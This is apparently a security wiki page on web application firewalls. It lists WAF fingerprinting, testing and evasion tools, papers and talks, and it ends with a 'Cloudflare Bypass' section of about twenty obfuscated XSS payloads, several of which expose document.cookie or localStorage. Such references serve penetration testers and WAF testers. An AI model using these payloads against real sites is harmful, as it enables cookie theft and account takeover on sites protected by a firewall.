Web Application Firewall

Search…
​Awesome-WAF - The Definitive Guide.
Fingerprinting
​WhatWaf - Detect and bypass web application firewalls and protection systems
​WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity.
​IdentYwaf - A blind WAF detection tool which utlises a unique method of identifying WAFs based upon previously collected fingerprints by @stamparm.
Testing
​XSS-Rat's WAF Checklist - Everything you need to do to bypass a Web Application Firewall.
​GoTestWAF - A tool to test a WAF's detection logic and bypasses from @wallarm.
​Lightbulb Framework - A WAF testing suite written in Python.
​WAFBench - A WAF performance testing suite by Microsoft.
​WAF Testing Framework - A WAF testing tool by Imperva.
​Framework for Testing WAFs (FTW) - A framework by the OWASP CRS team that helps to provide rigorous tests for WAF rules by using the OWASP Core Ruleset V3 as a baseline.
​abuse-ssl-bypass-waf - Bypassing WAF by abusing SSL/TLS Ciphers
Evasion
​WAFNinja - A smart tool which fuzzes and can suggest bypasses for a given WAF by @khalilbijjou.
​WAFTester - Another tool which can obfuscate payloads to bypass WAFs by @Raz0r.
​libinjection-fuzzer - A fuzzer intended for finding libinjection bypasses but can be probably used universally.
​bypass-firewalls-by-DNS-history - Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
​abuse-ssl-bypass-waf - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
​SQLMap Tamper Scripts - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.
​Bypass WAF BurpSuite Plugin - A plugin for Burp Suite which adds some request headers so that the requests seem from the internal network
Bypass Payloads
​https://github.com/waf-bypass-maker/waf-community-bypasses​
​https://github.com/Walidhossain010/WAF-bypass-xss-payloads​
Blogs and Writeups
Many of the content mentioned above have been taken from some of the following excellent writeups.
​Web Application Firewall (WAF) Evasion Techniques #1 - By @Secjuice.
​Web Application Firewall (WAF) Evasion Techniques #2 - By @Secjuice.
​Web Application Firewall (WAF) Evasion Techniques #3 - By @Secjuice.
​How To Exploit PHP Remotely To Bypass Filters & WAF Rules- By @Secjuice​
​ModSecurity SQL Injection Challenge: Lessons Learned - By @SpiderLabs.
​XXE that can Bypass WAF - By @WallArm.
​SQL Injection Bypassing WAF - By @OWASP.
​How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing - By @SunnyHoi.
​Bypassing Web-Application Firewalls by abusing SSL/TLS - By @0x09AL.
​Request Encoding to Bypass WAFs - By @Soroush Dalili​
Video Presentations
​WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior from @OWASP.
​Confessions of a WAF Developer: Protocol-Level Evasion of Web App Firewalls from BlackHat USA 12.
​Web Application Firewall - Analysis of Detection Logic from BlackHat.
​Bypassing Browser Security Policies for Fun & Profit from BlackHat.
​Web Application Firewall Bypassing from Positive Technologies.
​Fingerprinting Filter Rules of Web Application Firewalls - Side Channeling Attacks from @UseNix.
​Evading Deep Inspection Systems for Fun and Shell from BlackHat US 13.
​Bypass OWASP CRS && CWAF (WAF Rule Testing - Unrestricted File Upload) from Fools of Security.
​WAFs FTW! A modern devops approach to security testing your WAF from AppSec USA 17.
​Web Application Firewall Bypassing WorkShop from OWASP.
​Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch from Rafay Bloch.
​WTF - WAF Testing Framework from AppSecUSA 13.
​The Death of a Web App Firewall from Brian McHenry.
​Adventures with the WAF from BSides Manchester.
​Bypassing Intrusion Detection Systems from BlackHat.
​Building Your Own WAF as a Service and Forgetting about False Positives from Auscert.
Presentations & Research Papers
Research Papers:
​Protocol Level WAF Evasion - A protocol level WAF evasion techniques and analysis by Qualys.
​Neural Network based WAF for SQLi - A paper about building a neural network based WAF for detecting SQLi attacks.
​Bypassing Web Application Firewalls with HTTP Parameter Pollution - A research paper from Exploit DB about effectively bypassing WAFs via HTTP Parameter Pollution.
​Poking A Hole in the Firewall - A paper by Rafay Baloch about modern firewall analysis.
​Modern WAF Fingerprinting and XSS Filter Bypass - A paper by Rafay Baloch about WAF fingerprinting and bypassing XSS filters.
​WAF Evasion Testing - A WAF evasion testing guide from SANS.
​Side Channel Attacks for Fingerprinting WAF Filter Rules - A paper about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12.
​WASC WAF Evaluation Criteria - A guide for WAF Evaluation from Web Application Security Consortium.
​WAF Evaluation and Analysis - A paper about WAF evaluation and analysis of 2 most used WAFs (ModSecurity & WebKnight) from University of Amsterdam.
​Bypassing all WAF XSS Filters - A paper about bypassing all XSS filter rules and evading WAFs for XSS.
​Beyond SQLi - Obfuscate and Bypass WAFs - A research paper from Exploit Database about obfuscating SQL injection queries to effectively bypass WAFs.
​Bypassing WAF XSS Detection Mechanisms - A research paper about bypassing XSS detection mechanisms in WAFs.
Presentations:
​Methods to Bypass a Web Application Firewall - A presentation from PT Security about bypassing WAF filters and evasion.
​Web Application Firewall Bypassing (How to Defeat the Blue Team) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by @OWASP.
​WAF Profiling & Evasion Techniques - A WAF testing and evasion guide from OWASP.
​Protocol Level WAF Evasion Techniques - A presentation at about efficiently evading WAFs at protocol level from BlackHat US 12.
​Analysing Attacking Detection Logic Mechanisms - A presentation about WAF logic applied to detecting attacks from BlackHat US 16.
​WAF Bypasses and PHP Exploits - A presentation about evading WAFs and developing related PHP exploits.
​Side Channel Attacks for Fingerprinting WAF Filter Rules - A presentation about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12.
​Our Favorite XSS Filters/IDS and how to Attack Them - A presentation about how to evade XSS filters set by WAF rules from BlackHat USA 09.
​Playing Around with WAFs - A small presentation about WAF profiling and playing around with them from Defcon 16.
​A Forgotten HTTP Invisibility Cloak - A presentation about techniques that can be used to bypass common WAFs from BSides Manchester.
​Building Your Own WAF as a Service and Forgetting about False Positives - A presentation about how to build a hybrid mode waf that can work both in an out-of-band manner as well as inline to reduce false positives and latency Auscert2019.
Attack Code
Cloudflare Bypass
1
<svg%0Aonauxclick=0;[1].some(confirm)//
2
​
3
<svg onload=alert%26%230000000040"")>
4
​
5
<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>
6
<svg onx=() onload=(confirm)(1)>
7
​
8
<svg onx=() onload=(confirm)(document.cookie)>
9
​
10
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
11
​
12
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
13
​
14
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
15
​
16
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
17
​
18
"><onx=[] onmouseover=prompt(1)>
19
​
20
%2sscript%2ualert()%2s/script%2u -xss popup
21
​
22
<svg onload=alert%26%230000000040"1")>
23
​
24
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
25
​
26
[1].map(confirm)'ale'+'rt'()a&Tab;l&Tab;e&Tab;r&Tab;t(1)prompt&lpar;1&rpar;prompt&#40;1&#41;prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
27
​
28
<svg onload=prompt%26%230000000040document.domain)>
29
​
30
<svg onload=prompt%26%23x000000028;document.domain)>
31
​
32
<svg/onrandom=random onload=confirm(1)>
33
​
34
<video onnull=null onmouseover=confirm(1)>
35
​
36
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
37
​
38
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
39
​
40
<img ignored=() src=x onerror=prompt(1)>
Copied!
OAuth 2.0
Attacks and Vulnerabilities
Last modified 7mo ago
Copy link
Contents
Presentations & Research Papers
Attack Code
Cloudflare Bypass